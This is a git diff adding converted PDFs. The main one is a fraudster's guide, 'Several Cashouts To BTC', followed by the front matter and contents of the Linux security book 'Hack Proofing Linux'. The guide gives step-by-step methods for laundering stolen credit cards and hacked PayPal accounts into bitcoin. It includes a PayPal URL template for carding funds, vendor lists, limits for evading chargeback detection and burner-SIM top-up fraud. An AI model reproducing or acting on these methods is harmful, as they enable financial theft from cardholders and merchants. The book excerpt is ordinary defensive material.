Patent_pdf.md new file mode 100644 index 0000000..a177294 --- /dev/null +++ b/Security Laminate Patent_pdf.md @@ -0,0 +1,5 @@ +# Security Laminate Patent + + +--- + diff --git a/Several Cashouts To BTC_pdf.md b/Several Cashouts To BTC_pdf.md new file mode 100644 index 0000000..623c970 --- /dev/null +++ b/Several Cashouts To BTC_pdf.md @@ -0,0 +1,107 @@ +# Several Cashouts To BTC + + +--- + +Several Cashouts To BTC +*Introductory Methods* +Now that I mentioned buymebitcoin.co.uk, I have to add that they're completely retarded, and I joke not! I am still +squeezing out BTC from them using Fake Utility scans (which can be easily found on the internet) confirming the +address of the CC (which cannot be attached to PP) owner. That's all. They promise to have, and I quote, "Over +25BTC in stock, daily". To me, that's just inviting to a good fuck Big Grin. +************** I'm going to introduce an array of methods to cashout using either PayPal, CCs or both, some of +which require you to do more work than others, but the payout will be beautiful. I won't even mention that your +security needs to be tight to hide your ass every step of the way, so VPN & Socks5 needed. **Method one** +Requirements +- PayPal account (Verified is better, these can be bought or created yourself) +- PayPal transfers from users such as GH0ST0WL (on Evo) OR CCs to send funds to yourself (this option ishotter, +but viable) +There are a lot of sites which require PayPal payments for x amount of some eCurrency, i.e. egoPay, WebMoneyz +or UKash, but it takes a while to process if you directly use a CC to buy it. However, what I found, is that using +hacked funds in which a chargeback concurs after, say, a week, these eCurrencies can be bought flawlessly, all the +while without alerting the site owners of fraudalent activities. There are a few ways to get these funds; either pay for +a service which does so, or use PayPal's 'xclick/business' function to card some funds for a few hours, which, I +believe, is enough time for those sites which claim 'Delivery within 3 hours'. The way this PayPal function works is +as follows: +http://paypal.com/xclick/business=YOUREMAIL&amount=USDPRICE&item_name=0FAKEITEM +So, you specify your PayPal email address, your amount, and name a fake item in which the CC (which MUST NOT +already be attached to a PayPal) owner is buying, and then you should have the funds, though, this sometimes fails +to work depending on a varied number of factors. There are other ways to do this, +i.e. setting up a http://www.payhip.com account, listing a random PDF for sale, and paying yourself using CCs to +your PayPal. +Once you have the moniez, you should be good to go. At this stage, I'd use my Google skills to look for sites which +accept PayPal and offer to deliver near instantly. I guess the straight PayPal to BTC site is this: +http://www.thebitcoinshop.info, but they require you to be verified for larger amounts. +However, sometimes sites like these do not always guarantee Bitcoins to your wallet. So, you're gonna have to be +intuitive and look for other eCurrencies which can be bought using your hacked funds; either near instantly if the CC +was used, or within a few days, if a hacked PayPal transfer was used. For the purposes of the method, I had chose +to acquire UKash vouchers, as these can be cashed out to BTC and even to a Bank account, if you find the right +exchange service. +So what is UKash? You have to do your homework on these eCurrencies to figure out the core mechanism on how +they work. A quick Wikipedia skim tells me: +Ukash is an electronic money system regulated by the Financial Conduct Authority, that allows users to exchange +their cash for a secure code. The code is then used to make payments online, to load cards or e-wallets or for +money transfer. Codes are available from participating retail locations, kiosks, ATMs and online.Ukash users are +given a unique 19-digit code representing their prepaid money; this is entered when making a transfer, payment or +purchase online. (Wikipedia) To find sites who sell UKash vouchers via PayPal without running a tight ship, can be +hard. These sites which offer this, however, can be found with a quick search on your favourite search engine; +Google. Sites which offer credit/debit card payments through PayPal are GOLDEN, but you always have to assume +that these sites have previously been victims of fraudalent activites, and so using hacked PayPals should suffice. +When searching, I'd use keywords such as: PayPal, Ukash, Instant delivery and change the search filters so that it +shows sites that are less than a month old. Here's what I obtained in about 20 minutes work: + +http://xboxliveuk76.com http://cardscodes.com http://vougift.com http://www.allcdkey.com +http://www.vouchersolutions.tk http://zonalmarket.com/E- +Wallet/account/login.php?redirect=http://zonalmarket.com/E-Wallet/pages/buyukashbtcpm.php +http://instantselling.biz http://www.ukashkartal.com +All of these sites use PayPal as a means of paying for their (really fucking overpriced) UKash vouchers, and offer a +near instant delivery (< 3 hours) . I would STRONGLY advise you to stay below £150 (3x£50 UKash) per PayPal +account in order to receive the code(s). I've tried to directly use a CC to buy, but they'd always end up refunding me, +for reasons unknown, and sometimes, they'd do the same for paying with PayPal (just a heads up). Since the +chargeback only occurs after a few hours, you should, in theory, receive your code(s). Hereon, everything becomes +so much easier, as any old site would accept UKash to exchange for BTC or other currencies. There's even a site +which pays you straight to your bank for a relatively small fee. If you're at this point, scratching your head, I'm going +to make it easy for you just this once: +http://www.bitcoin-services.co.uk/ukash-to-bitcoin.php <-- This site offers the best price for UKash vouchers as one +£50 can get you about 0.17 +BTC This also applies for other eCurrencies, such as PerfectMoney or egoPay USD, etc. So, again, I'm going to +search for a site which sells Perfect Money vouchers and promises near instant deliver with PayPal as their +payment processer; http://www.perfectevoucher.com is a site which offers this. They have a varied amount that you +can buy, but that all depends on the funds that you have in your PayPal. Now, once I have the code for the voucher, +I can proceed to sell it for BTC, and there are many exchange sites which offer this; again, here's one, pm2btc.me. +I want to further emphasise that eCurrency vouchers > BTC is the way to go these days, and would like to place a +few inspiring sites for you to 'look' at: - - - http://www.evoucher-world.com +- - - http://24hexchange.net/buy.html +- - - http://bestemoneys.com/e-currency-exchange_1.html +- - - http://www.mamooti.com +- - - http://www.interkassa.com/index.php +A golden forum: - http://www.dreamteammoney.com/index.php?showforum=24 +- https://bitcointalk.org/index.php?board=53.0 +So, all in all, using what you know in par with what you have can result in a great reward, and in this case, it's the +reward of some sort of eCurrency, in which you can use to cashout to BTC. This is only touching the surface, +however, and the rest is up to you. +**Method Two** +Requirements - Burner phone: this can be bought cheap online or, in the UK, bought from Tesco - SIM cards: has to +be from a crappy provider (In the UK, Tesco Mobile/O2, or Lebara) - CCs to top up the SIM cards I, some time ago, +noticed Blockchain's SMS deposit, and thought, "Can I card the shit out of this?" and so, I pursued to do so +(Blockchain had removed this feature). I bought a burner phone for a method that I previously bought, and bulk O2 +SIM cards off Craigslist, and, eventually, SMS to Bitcoin or any other cashout method then seemed viable. So you +have a burner phone, you have a SIM, and you have a CC, what can you do with it? Well the obvious thing is to call +up the automated service and top up the phone using your CC information. Try to buy CCs from the country in +which the SIM was issued, i.e. UK SIMS => UK CCs. Always aim for the Maximum amount the SIM can be topped +up, but be considerate, as over 3 or so fraudalent top ups can cause the SIM to be eventually blocked. You can +always buy top up vouchers from http://phonepal.co.uk using CCs which are not attached to a PayPal card, but I'd +buy only one. +Now, you should have a topped up SIM, you can go ahead and buy BTC from Blockchain or +http://bitcoinsinstant.info, and specify your wallet address, et voila, you should have a slow, but stable way to get +BTC. This is only one way to make use of this, I'd imagine you to be a bit more creative Big Grin +If you can card 250 EUROS onto a SIM, try ahead and use http://www.ukashkartal.com Mobile Payment +**A Notice** + +The fundamental teaching I want you to take away from here is pretty much to be innovative; there is money to +make in everything; this is just an insight to the whole carding scene. I mean, I could tell you to create a domain +(http://www.domains4bitcoins.com), create several fake pages, have several fake policies all advertising on how you +would offer the best price for BTC via a SMS payment, and then advertise it on Exchange forums, but I won't dwell +into that now Tongue. Anyways, I think my work here is done. Hopefully, this will be the last guide you purchase, +because you've wisened up. +Good luck, and stay safe. Nothing is true. Everything is permitted. diff --git a/Syngress - Hack Proofing Linux (2001)_pdf.md b/Syngress - Hack Proofing Linux (2001)_pdf.md new file mode 100644 index 0000000..9498893 --- /dev/null +++ b/Syngress - Hack Proofing Linux (2001)_pdf.md @@ -0,0 +1,22118 @@ +# Syngress - Hack Proofing Linux (2001) + + +--- + +138_linux_FC 6/20/01 9:56 AM Page 1 +1YEAR UPGRADE +BUYER PROTECTION PLAN +™ +Your Guide to Open Source Security +• Step-by-Step Instructions for Deploying Open Source Security Tools +• Hundreds of Tools & Traps and Damage & Defense Sidebars, +Security Alerts,and Exercises! +• Bonus WalletCD with Configuration Examples,PacketCaptures, +and Programs +James Stanger, Ph.D. +Patrick T. Lane +Edgar Danielyan +Technical Editor + +138_linux_FM 6/20/01 9:29 AM Page i +s o l u t i o n s @ s y n g r e s s . c o m +With more than 1,500,000 copies of our MCSE, MCSD, CompTIA, and Cisco +study guides in print, we continue to look for ways we can better serve the +information needs of our readers. One way we do that is by listening. +Readers like yourself have been telling us they want an Internet-based ser- +vice that would extend and enhance the value of our books. Based on +reader feedback and our own strategic plan, we have created a Web site +that we hope will exceed your expectations. +Solutions@syngress.com is an interactive treasure trove of useful infor- +mation focusing on our book topics and related technologies. The site +offers the following features: +(cid:2) One-year warranty against content obsolescence due to vendor +product upgrades. You can access online updates for any affected +chapters. +(cid:2) “Ask the Author”™ customer query forms that enable you to post +questions to our authors and editors. +(cid:2) Exclusive monthly mailings in which our experts provide answers to +reader queries and clear explanations of complex material. +(cid:2) Regularly updated links to sites specially selected by our editors for +readers desiring additional reliable information on key topics. +Best of all, the book you’re now holding is your key to this amazing site. +Just go to www.syngress.com/solutions, and keep this book handy when +you register to verify your purchase. +Thank you for giving us the opportunity to serve your needs. And be sure +to let us know if there’s anything else we can do to help you get the max- +imum value from your investment. We’re listening. +www.syngress.com/solutions + +138_linux_FM 6/20/01 9:29 AM Page ii + +138_linux_FM 6/20/01 9:29 AM Page iii +1YEAR UPGRADE +BUYER PROTECTION PLAN +™ +LLiinnuuxx::AA +GGuuiiddee +ttoo +OOppeenn +SSoouurrccee +SSeeccuurriittyy +The Only Way to Stop a Hacker Is to Think Like One +James Stanger +Patrick T. Lane + +138_linux_FM 6/20/01 9:29 AM Page iv +Syngress Publishing,Inc.,the author(s),and any person or firm involved in the writing,editing,or production +(collectively “Makers”) of this book (“the Work”) do not guarantee or warrant the results to be obtained from +the Work. +There is no guarantee of any kind,expressed or implied,regarding the Work or its contents.The Work is sold +AS IS and WITHOUT WARRANTY. You may have other legal rights,which vary from state to state. +In no event will Makers be liable to you for damages,including any loss of profits,lost savings,or other inci- +dental or consequential damages arising out from the Work or its contents.Because some states do not allow +the exclusion or limitation of liability for consequential or incidental damages,the above limitation may not +apply to you. +You should always use reasonable care,including backup and other appropriate precautions,when working +with computers,networks,data,and files. +Syngress Media®,Syngress®,and “Career Advancement Through Skill Enhancement®,”are registered trademarks +of Syngress Media,Inc. “Ask the Author™,”“Ask the Author UPDATE™,”“Mission Critical™,”and “Hack +Proofing™”are trademarks of Syngress Publishing,Inc. Brands and product names mentioned in this book are +trademarks or service marks of their respective companies. +KEY SERIAL NUMBER +001 NFKA4UR934 +002 DFTGEGHFG6 +003 9456VMPDSP +004 MKC8EWR535 +005 ZL94V343BB +006 AS56J89HGE +007 MJTY3D29H6 +008 ADQW9UU6NN +009 5TGBXDQ7TN +010 KRF4W2F6P9 +PUBLISHED BY +Syngress Publishing,Inc. +800 Hingham Street +Rockland,MA 02370 +Hack Proofing Linux: A Guide to Open Source Security +Copyright © 2001 by Syngress Publishing,Inc. All rights reserved.Printed in the United States of America. +Except as permitted under the Copyright Act of 1976,no part of this publication may be reproduced or dis- +tributed in any form or by any means,or stored in a database or retrieval system,without the prior written +permission of the publisher,with the exception that the program listings may be entered,stored,and executed +in a computer system,but they may not be reproduced for publication. +Printed in the United States of America +1 2 3 4 5 6 7 8 9 0 +ISBN: 1-928994-34-2 +Technical Editors:Edgar Danielyan and Larry Karnis Freelance Editorial Manager:Maribeth Corona-Evans +Co-Publisher:Richard Kristof Cover Designer:Michael Kavish +Acquisitions Editor:Catherine B.Nolan Page Layout and Art by:Shannon Tozier +Developmental Editor:Kate Glennon Copy Editor:Beth A.Roberts and Darren Meiss +CD Production:Michael Donovan Indexer:Jennifer Coker +Distributed by Publishers Group West in the United States. + +138_linux_FM 6/20/01 9:29 AM Page v +Acknowledgments +We would like to acknowledge the following people for their kindness and support +in making this book possible. +Richard Kristof and Duncan Anderson of Global Knowledge,for their generous +access to the IT industry’s best courses,instructors,and training facilities. +Ralph Troupe,Rhonda St.John,and the team at Callisma for their invaluable insight +into the challenges of designing,deploying and supporting world-class enterprise +networks. +Karen Cross,Lance Tilford,Meaghan Cunningham,Kim Wylie,Harry Kirchner,Bill +Richter,Kevin Votel,and Kent Anderson of Publishers Group West for sharing their +incredible marketing experience and expertise. +Mary Ging,Caroline Hird,Simon Beale,Caroline Wheeler,Victoria Fuller,Jonathan +Bunkell,and Klaus Beran of Harcourt International for making certain that our +vision remains worldwide in scope. +Anneke Baeten,Annabel Dent,and Laurie Giles of Harcourt Australia for all their +help. +David Buckland,Wendi Wong,Daniel Loh,Marie Chieng,Lucy Chong,Leslie Lim, +Audrey Gan,Charlotte Chan,and Joseph Chan of Transquest Publishers for the +enthusiasm with which they receive our books. +Kwon Sung June at Acorn Publishing for his support. +Ethan Atkin at Cranbury International for his help in expanding the Syngress +program. +Joe Pisco,Helen Moyer,Paul Zanoli,Alan Steele,and the great folks at InterCity +Press for all their help. +Philip Allen at Brewer & Lord LLC for all his work and generosity. +vv + +138_linux_FM 6/20/01 9:29 AM Page vi + +138_linux_FM 6/20/01 9:29 AM Page vii +Contributors +Patrick T. Lane (MCSE,MCP+I,MCT,Network+,i-Net+,CIW) +is a Content Architect for ProsoftTraining.com,a leading Internet skills +training and curriculum development company.He is the author of +more than 20 technical courses and is the Director of the CIW +Foundations and CIW Internetworking Professional series.While at +ProsoftTraining.com,Patrick helped create the Certified Internet +Webmaster (CIW) program and the i-Accelerate program for Intel, +Novell,and Microsoft professionals. +Patrick consults as a mail,news,FTP,and Web Administrator for sev- +eral organizations,including jCert Initiative Inc.and ProsoftTraining.com. +He is also a network security consultant and writer who specializes in +TCP/IP internetworking,LAN/WAN solutions,network and operating +system security,and the Linux and Windows NT/2000 platforms.He has +consulted for the University of Phoenix/Apollo Group,Novell,Intel, +NETg,WAVE technologies,KT Solutions,SmartForce,and Futurekids. +Patrick is a member of the CompTIA Network+ Advisory Committee, +and co-author of Syngress Publishing’s E-mail Virus Protection Handbook +(ISBN:1-928994-23-7).His work has been published in eight languages +and he has been a featured speaker for the SmartForce Seminar Series on +E-Business,the Internet World PING Series on Internet Protocol version +6,and the Information Technology Association of America (ITAA).He +holds a master’s degree in education. +James Stanger (Ph.D.,MCSE,MCT) directs the Linux,Security,and +Server Administrator certification tracks for ProsoftTraining.com.Since +receiving his Ph.D.in 1997,he has focused on auditing Internet servers +and writing courseware,books,and articles about administering and +securing Internet servers.James has consulted for IBM,Symantec,Evinci +vii + +138_linux_FM 6/20/01 9:29 AM Page viii +(www.evinci.org),Pomeroy (www.pomeroy.com),Securify +(www.securify.com),Brigham Young University,and California State,San +Bernardino.He specializes in troubleshooting firewalls,intrusion detec- +tion,DNS,e-mail,and Web server implementations. +James was the Technical Editor of Syngress Publishing’s E-mail Virus +Protection Handbook (ISBN:1-928994-23-7) and has been an instructional +designer of security and A+ courses for NetG,Thompson/WAVE +learning,and ComputerPREP.Active in the Linux community,James +sits on the Linux Professional Institute (www.lpi.org),SAIR +(www.linuxcertification.org),and CompTIA Linux+ (www.comptia.org) +advisory boards,each of which is dedicated to creating and maintaining +industry-respected certifications.As the Vice Chair of the Linux +Professional Institute (LPI) Advisory Council,he acts as liaison between +the LPI and companies such as IBM,Compaq,and Intel. +viii + +138_linux_FM 6/20/01 9:29 AM Page ix +Technical Editors +Edgar Danielyan (CCNA) is a self-employed developer specializing in +GCC,X Window,Tcl/Tk,logic programming,Internet security,and +TCP/IP;as well as having with BSD,SVR4.2,FreeBSD,SCO,Solaris,and +UnixWare.He has a diploma in company law from the British Institute of +Legal Executives as well as a paralegal certificate from the University of +Southern Colorado.He is currently working as the Network +Administrator and Manager of a top-level Armenian domain.He has also +worked for the United Nations,the Ministry of Defense of the Republic +of Armenia,and Armenian national telephone companies and financial +institutions.Edgar speaks four languages,and is a member of ACM,IEEE +CS,USENIX,CIPS,ISOC,and IPG. +Larry Karnis (RHCE,Master ACE,CITP),is a Senior Consultant for +Application Enhancements,a Unix,Linux,and Internet consulting firm +located in Toronto,Canada.His first exposure to Unix was over 20 years +ago where he used Unix Version 6 while completing a bachelor’s degree +in computer science and mathematics.Larry deploys and manages Linux- +based solutions such as Web and file and print servers,and Linux firewalls. +ix + +138_linux_FM 6/20/01 9:29 AM Page x +About the CD +This book is accompanied by a CD containing files and open source programs used +throughout the book.The files include configuration examples,packet captures,and +additional resources.We have included the specific open source programs used in the +book so you can follow the chapter demonstrations step-by-step on your own systems. +Each file on the CD is discussed in detail and referenced throughout the book +with the CD icon below.When a specific file or program is required,it directs you to +the accompanying CD.The book also directs you to the Web site where you can +download the most current version,and find additional resources relating to that pro- +gram.For instance,you can download Free Secure Wide Area Network (FreeS/WAN) +at www.freeswan.org,or use the version located on the CD.It is recommended that +you use the version included on the CD because this will increase the chances that +the book demonstrations will be successful,as some of the programs may have +changed since this book was printed. +The book is written to Red Hat Linux 7.x.Therefore,most of the CD files are +Red Hat Package Manager (.rpm) files.There are also many Tape Archive (.tar) files +and GNU Zip (.gzip) files.Instructions for unpacking and installing these files are +included in their respective locations throughout the book.To mount the CD onto +your Linux system,you would issue the following command (for Red Hat systems): +mount -t iso9660 /dev/cdrom /mnt/cdrom +And to unmount: +umount /mnt/cdrom +It is recommended that you copy the CD files to your hard drive before working +with them.If you use other versions of Linux,you may need to modify the demon- +strations,or download a portable version of the open source programs to work with +your version of Linux. +Look for this CD icon when obtaining files used +in the book demonstrations. +x + +138_linux_ToC 6/20/01 9:27 AM Page xi +Contents +Foreword xxvii +Using the GNU Chapter 1 Introduction to Open +General Public License Source Security 1 +Introduction 2 +The GNU General Public The Tools Used in This Book 3 +License (GPL) is the basis +Using the GNU General Public License 3 +of the open source +Fee-Based GPL Software 5 +movement. This license is +provided by the Gnu is Can I Use GPL Software in My Company? 5 +Not Unix (GNU) +Soft Skills:Coping with Open Source Quirks 6 +organization, which +General Lack of Installation and Configuration +develops various software +packages. The most Support 6 +important element of this +Infrequent or Irregular Update Schedules 6 +license is that instead of +Command-Line Dominance 6 +protecting a particular +person or company, it Lack of Backward Compatibility and No +protects the software code Regular Distribution Body 7 +that creates the +Inconvenient Upgrade Paths 7 +application. +Conflicts in Supporting Libraries and Limited +Platform Support 7 +Interface Changes 8 +Partially Developed Solutions 8 +Should I Use an RPM or Tarballs? 10 +Tarball 10 +Red Hat Package Manager 11 +Debian 11 +Obtaining Open Source Software 12 +SourceForge 12 +Freshmeat 13 +Packetstorm 14 +xi + +138_linux_ToC 6/20/01 9:27 AM Page xii +xii Contents +SecurityFocus 15 +Is That Download Safe? 16 +A Brief Encryption Review 16 +Symmetric Key Encryption 17 +Asymmetric Key Encryption 18 +Public Key and Trust Relationships 19 +One-Way Encryption 20 +GNU Privacy Guard 21 +Deploying GNU Privacy Guard 21 +Skipping Public Key Verification 29 +Using GPG to Verify Signatures on +Tarball Packages 30 +Using Md5sum 30 +Auditing Procedures 31 +Locking Down Your Network Hosts 31 +Securing Data across the Network 32 +Protecting the Network Perimeter 33 +Summary 35 +Solutions Fast Track 35 +Frequently Asked Questions 38 +Chapter 2 Hardening the Operating +System 41 +Introduction 42 +Updating the Operating System 42 +Red Hat Linux Errata and Update Service +Packages 42 +Handling Maintenance Issues 43 +Red Hat Linux Errata:Fixes and Advisories 44 +Bug Fix Case Study 46 +Manually Disabling Unnecessary Services +and Ports 47 +Services to Disable 47 +The xinetd.conf File 48 +Locking Down Ports 50 +Well-Known and Registered Ports 50 +Determining Ports to Block 52 + +138_linux_ToC 6/20/01 9:27 AM Page xiii +Contents xiii +Blocking Ports 53 +Xinetd Services 53 +Determining Which +Stand-Alone Services 54 +Ports to Block +Hardening the System with Bastille 55 +Bastille Functions 55 +When determining which +ports to block on your Bastille Versions 63 +server, you must first Implementing Bastille 64 +determine which services +Undoing Bastille Changes 74 +you require. In most cases, +block all ports that are not Controlling and Auditing Root Access with Sudo 77 +exclusively required by System Requirements 79 +these services. This is tricky, +The Sudo Command 79 +because you can easily +Downloading Sudo 80 +block yourself from +services you need, Installing Sudo 82 +especially services that use +Configuring Sudo 86 +ephemeral ports. If your +Running Sudo 90 +server is an exclusive e-mail +server running SMTP and No Password 92 +IMAP, you can block all TCP +Sudo Logging 93 +ports except ports 25 and +Managing Your Log Files 96 +143, respectively. If your +server is an exclusive HTTP Using Logging Enhancers 97 +server, you can block all SWATCH 97 +ports except TCP port 80. +Scanlogd 100 +Syslogd-ng 101 +Summary 103 +Solutions Fast Track 104 +Frequently Asked Questions 107 +Chapter 3 System Scanning and Probing 109 +Introduction 110 +Scanning for Viruses Using the AntiVir Antiviru +Application 110 +Understanding Linux Viruses 110 +Using AntiVir 112 +Key Mode and Non-Key Mode 114 +Licensing AntiVir 114 +Exercise:Updating AntiVir 114 +Using TkAntivir 116 +Required Libraries and Settings 117 + +138_linux_ToC 6/20/01 9:27 AM Page xiv +xiv Contents +Scanning Systems for Boot Sector and +E-Mail Viruses 117 +Additional Information 120 +Exercise:Using TkAntivir 120 +Learn How to Set +Preferences For Scanning Systems for DDoS Attack Software +TkAntivir +Using a Zombie Zapper 123 +How Zombies Work and How to Stop Them 124 +When Should I Use a Zombie Zapper? 125 +What Zombie Zapper Should I Use? 125 +What Does Zombie Zapper Require +to Compile? 127 +Exercise:Using Zombie Zapper 127 +Scanning System Ports Using the Gnome Service +Scan Port Scanner 129 +Required Libraries 130 +Why Use a Port Scanner? 131 +Exercise:Using Gnome Service Scanner 131 +Using Nmap 133 +Isn’t Nmap Just Another Port Scanner? 134 +Acquiring and Installing Nmap 136 +Common Nmap Options 136 +Applied Examples 137 +Scanning Entire Networks and Subnets 138 +Selective Scanning 139 +Adding More Stealth 139 +Saving to Text and Reading from Text 140 +Testing Firewalls and Intrusion Detection +Systems 141 +Example:Spoofing the Source Address +of a Scan 142 +Timing Your Scan Speeds 142 +Example:Conducting a Paranoid Scan 143 +Exercise:Using Nmap 143 +Using Nmap in Interactive Mode 144 +Exercise:Using Nmap in Interactive +Mode 144 + +138_linux_ToC 6/20/01 9:27 AM Page xv +Contents xv +Using NmapFE as a Graphical Front End 146 +Exercise:Using NmapFE 147 +Using Remote Nmap (Rnmap) as a Central +Scanning Device 147 +Exercise:Scanning Systems with Rnmap 148 +Deploying Cheops to Monitor Your Network 151 +How Cheops Works 153 +Obtaining Cheops 154 +Required Libraries 154 +The Cheops Interface 155 +Mapping Relations between Computers 157 +Cheops Monitoring Methods 157 +Connectivity Features 159 +Exercise:Installing and Configuring +Cheops 160 +Deploying Nessus to Test Daemon Security 165 +The Nessus Client/Server Relationship 167 +Windows Nessus Clients 169 +Required Libraries 169 +Order of Installation 170 +Configuring Plug-Ins 173 +Creating a New Nessus User 174 +The Rules Database 174 +Exercise:Installing Nessus and +Conducting a Vulnerability Scan 175 +Updating Nessus 179 +Understanding Differential,Detached, +and Continuous Scans 180 +Exercise:Conducting Detached +and Differential Scans with Nessus 182 +Summary 185 +Solutions Fast Track 185 +Frequently Asked Questions 189 + +138_linux_ToC 6/20/01 9:27 AM Page xvi +xvi Contents +Chapter 4 Implementing an +Intrusion Detection System 191 +Introduction 192 +Understanding IDS Strategies and Types 194 +IDS Types 195 +Host-Based IDS Applications 196 +SECURITY ALERT! +Network-Based IDS Applications 196 +Although Tripwire has a +IDS Applications and Fault Tolerance 197 +“file integrity mode,” +Tripwire is not really an What Can an IDS Do for Me? 200 +integrity checker in the +Which IDS Strategy Is Best? 203 +classic sense. It does +not, for example, test Network-Based IDS Applications and +the file’s stability or Firewalls 203 +inode number or any +other aspect in regards IDS Applications 204 +to file storage. Tripwire Installing Tripwire to Detect File Changes on +simply compares a file’s +Your Operating System 206 +new signature with +that taken when the Tripwire Dependencies 207 +database was created. +Availability 208 +Other tools may be +used to check the Deploying Tripwire 208 +integrity of a file’s per- +Tripwire Files 208 +missions and ownership +information. Tripwire Installation Steps 209 +Configuring the Tripwire Policy File 209 +Creating the Tripwire Policy File 212 +Database Initialization Mode 212 +Testing E-Mail Capability 214 +Integrity Checking Mode 214 +Specifying a Different Database 215 +Reading Reports 215 +Updating Tripwire to Account for Legitimate +Changes in the OS 215 +Updating the Policy 216 +What Do I Do if I Find a Discrepancy? 217 +Configuring Tripwire to Inform You Concerning +Changes 217 +Exercise:Installing Tripwire 217 +Exercise:Securing the Tripwire Database 219 +Exercise:Using Cron to Run Tripwire +Automatically 220 + +138_linux_ToC 6/20/01 9:27 AM Page xvii +Contents xvii +Deploying PortSentry to Act as a +Host-Based IDS 220 +Important PortSentry Files 221 +Installing PortSentry 222 +Configuring PortSentry to Block Users 222 +Optimizing PortSentry to Sense Attack Types 223 +Exercise:Installing and Configuring +PortSentry 224 +Exercise:Clearing Ipchains Rules 227 +Exercise:Running an External Command +Using PortSentry 227 +Installing and Configuring Snort 229 +Availability 229 +Supporting Libraries 229 +Understanding Snort Rules 230 +Snort Variables 230 +Snort Files and Directories 231 +Snort Plug-Ins 232 +Starting Snort 233 +Logging Snort Entries 236 +Running Snort as a Network-Based IDS 236 +Ignoring Hosts 237 +Additional Logging Options:Text +files,Tcpdump,and Databases 237 +Configuring Snort to Log to a Database 238 +Controlling Logging and Alerts 239 +Getting Information 240 +Exercise:Installing Snort 240 +Exercise:Using Snort as an IDS +Application 241 +Exercise:Configuring Snort to Log to +a Database 243 +Exercise:Querying a Snort Database +from a Remote Host 251 +Identifying Snort Add-Ons 251 +SnortSnarf 252 + +138_linux_ToC 6/20/01 9:27 AM Page xviii +xviii Contents +Exercise:Using SnortSnarf to Read +Snort Logs 252 +Analysis Console for Intrusion Databases 252 +Summary 254 +Solutions Fast Track 254 +Frequently Asked Questions 258 +Chapter 5 Troubleshooting the +Network with Sniffers 261 +Introduction 262 +Understanding Packet Analysis and TCP +Handshakes 264 +TCP Handshakes 265 +Learn the Flags Used +Establishing a TCP Connection 265 +in TCP Connections +Terminating a TCP Connection 266 +Creating Filters Using Tcpdump 268 +Flag Description +Tcpdump Options 268 +SYN Synchronize Tcpdump Expressions 271 +sequence +Boolean Operators 275 +numbers. Used for +connection Installing and Using Tcpdump 276 +establishment. +Configuring Ethereal to Capture Network +FIN The sender is +finished with the Packets 279 +connection. Used Ethereal Options 281 +for connection +termination. Ethereal Filters 283 +RST Reset the Configuring Ethereal and Capturing Packets 283 +connection. +Viewing Network Traffic between Hosts Using +PSH Push the data. +EtherApe 288 +ACK Acknowledgment +Configuring EtherApe and Viewing Network +URG Urgent +Traffic 289 +Summary 293 +Solutions Fast Track 294 +Frequently Asked Questions 296 +Chapter 6 Network Authentication +and Encryption 299 +Introduction 300 +Understanding Network Authentication 300 + +138_linux_ToC 6/20/01 9:27 AM Page xix +Contents xix +Attacking Encrypted Protocols 301 +Creating Authentication and Encryption +Solutions 303 +Implementing One-Time Passwords +Answer Your (OTP and OPIE) 305 +Questions about +What Files Does OPIE Replace? 305 +Kerberos +How Does OPIE Work? 305 +OPIE Files and Applications 306 +Q: +I wish to remove a +opiepasswd 307 +principal from the +keytab of one of my Password Format 308 +Kerberos clients. How +Using opiekey 309 +do I do this? +Using opieinfo and opiekey to Generate +A: +Enter kadmin as an +a List 310 +administrative user on +the Kerberos client Installing OPIE 310 +(not the KDC) and use Configuration Options 310 +the ketremoveoption. +Installation Options 311 +For example, if you +Uninstalling OPIE 312 +wanted to remove the +principal for the user Exercise:Installing OPIE 312 +named james, you +Exercise:Installing the OPIE Client +would do the +on a Remote Server 315 +following: +Exercise:Using opie-tk and Allowing +terminal$/usr/ +kerberos/sbin/kadmin Windows Users to Deploy OPIE. 316 +kadmin: ktremove Exercise:Installing opieftpd 318 +–p james +Implementing Kerberos Version 5 319 +kadmin: quit +Why Is Kerberos Such a Big Deal? 320 +terminal$ +Kerberos Terms 321 +Kerberos Principals 322 +The Kerberos Authentication Process 323 +How Information Traverses the Network 324 +Creating the Kerberos Database 325 +Using kadmin.local 325 +Using kadmin 326 +Using kadmin on the Client 328 +Using kadmin and Creating Kerberos Client +Passwords 329 +Setting Policies 330 +Using Kinit 330 + +138_linux_ToC 6/20/01 9:27 AM Page xx +xx Contents +The kinit Command and Time Limits 332 +Managing Kerberos Client Credentials 333 +The kdestroy Command 333 +Exercise:Configuring a KDC 334 +Establishing Kerberos Client Trust Relationships +with kadmin 337 +Additional Daemon Principal Names 339 +Logging On to a Kerberos Host Daemon 340 +Common Kerberos Client Troubleshooting +Issues and Solutions 340 +Kerberos Client Applications 341 +Kerberos Authentication and klogin 342 +Exercise:Configuring a Kerberos Client 342 +Summary 345 +Solutions Fast Track 345 +Frequently Asked Questions 348 +Chapter 7 Avoiding Sniffing +Attacks through Encryption 353 +Secure E-Commerce Introduction 354 +Transactions +Understanding Network Encryption 354 +Capturing and Analyzing Unencrypted +If hackers were alerted to +Network Traffic 355 +an unsecure server, they +Using OpenSSH to Encrypt Network Traffic +could capture packets +going in and out of the between Two Hosts 361 +server to gain the data +The OpenSSH Suite 362 +they sought. For example, +Installing OpenSSH 364 +if an e-commerce server +does not use any type of Configuring SSH 367 +network encryption for How SSH Works 368 +transactions, there is a +Insecure r-command Authentication 368 +great deal of data to be +gained by a hacker. Secure SSH Authentication 371 +Unfortunately, many small Implementing SSH to Secure Data Transmissions +companies or +over an Insecure Network 373 +entrepreneurs set up their +own Web servers, Distributing the Public Key 376 +unaware of potential Capturing and Analyzing Encyrpted Network +security problems, and set +Traffic 381 +up simple scripts to +process payment forms. Summary 385 + +138_linux_ToC 6/20/01 9:27 AM Page xxi +Contents xxi +Solutions Fast Track 386 +Frequently Asked Questions 388 +Chapter 8 Creating Virtual Private +Networks 391 +Introduction 392 +Secure Tunneling with VPNs 392 +Telecommuter VPN Solution 392 +Router-to-Router VPN Solution 394 +Host-to-Host VPN Solution 395 +Tunneling Protocols 395 +Explaining the IP Security Architecture 396 +Using IPSec with a VPN Tunneling Protocol 400 +Secure Tunneling with +Virtual Private Internet Key Exchange Protocol 401 +Networks (VPNs) +Creating a VPN by Using FreeS/WAN 402 +Downloading and Unpacking FreeS/WAN 404 +VPNs provide a private +Compiling the Kernel to Run FreeS/WAN 407 +data network over public +Recompiling FreeS/WAN into the New +telecommunication +infrastructures, such as Kernel 417 +the Internet, by providing +Configuring FreeS/WAN 420 +authentication and +Testing IP Networking 420 +encryption through a data +“tunnel” between devices. Configuring Public 